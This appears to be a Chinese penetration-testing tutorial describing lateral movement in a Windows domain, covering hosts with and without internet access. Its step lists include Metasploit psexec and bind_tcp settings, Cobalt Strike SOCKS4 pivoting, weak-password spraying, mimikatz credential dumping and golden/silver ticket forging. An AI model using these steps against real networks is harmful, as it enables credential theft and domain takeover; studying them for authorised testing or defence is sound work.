1. 程式人生 > 實用技巧 >內網滲透-域內有網和無網

內網滲透-域內有網和無網

文章目錄

前言

在滲透測試的過程中,拿下域內一臺主機以後,有時候內網的其他主機有網,有時候沒網,此時,如果有網我們就按常規的滲透測試即可,如果沒網我們就應該以該主機作為跳板,使用socks協議或其他辦法,從而實現與無網的主機進行通訊

域內主機有網

在這裡插入圖片描述

攻擊流程

通過域環境webserver主機的外網WEB服務開啟到域控許可權的獲取
假如已經獲取webserver許可權:
0x01:

  • 通過phpmyadmin弱口令getshell

0x02:

  • msf生成 msf監聽 getsystem upload ‘/root/x64’ c:\test mimikatz
    privilege::debug sekurlsa::logonpasswords

0x03:

  • 批處理wmicexec測試弱口令 29 31 32 IP存在

0x04:

  • 獲取29 31 32許可權 反彈msf getsystem

0x05

  • 批處理wmicexec測試弱口令 21中標
  • execute -f cmd.exe -H -i 0x06
  • 匯出所有hash 進行黃金白銀票據

域內主機無網

在這裡插入圖片描述
Msf

  • 拿下weserver,發現有兩個網段,192.168.3.31 192.168.230.131
    假設192.168.230.131為外網,192.168.3.31為內網
  • 又發現內網其他主機都沒有聯網,只有webserver聯網了。
  • 此時,可以用webserver作為跳板,用cs開啟socks,並用msf

操作流程

#cobalt strike

  • 啟動,監聽,生成,上線,提權
  • cs啟動sockt4 生成監聽埠跳板,將setg Proxies
  • socks4:192.168.230.133:xxxxx複製到msf

msfconsole

  • 載入代理:setg Proxies socks4:192.168.230.133:xxxxx
  • 攻擊模組:ms17010 ms14068 smb psexec等
  • use exploit/windows/smb/psexec

#自己繫結自己,就實現了無網探針

  • set payload bind_tcp
  • set smbuser administrator
  • set smbpass [email protected]#45
  • 上傳mimikatz:upload ‘/root/x64’ c:\test
  • mimikatz privilege::debug sekurlsa::logonpasswords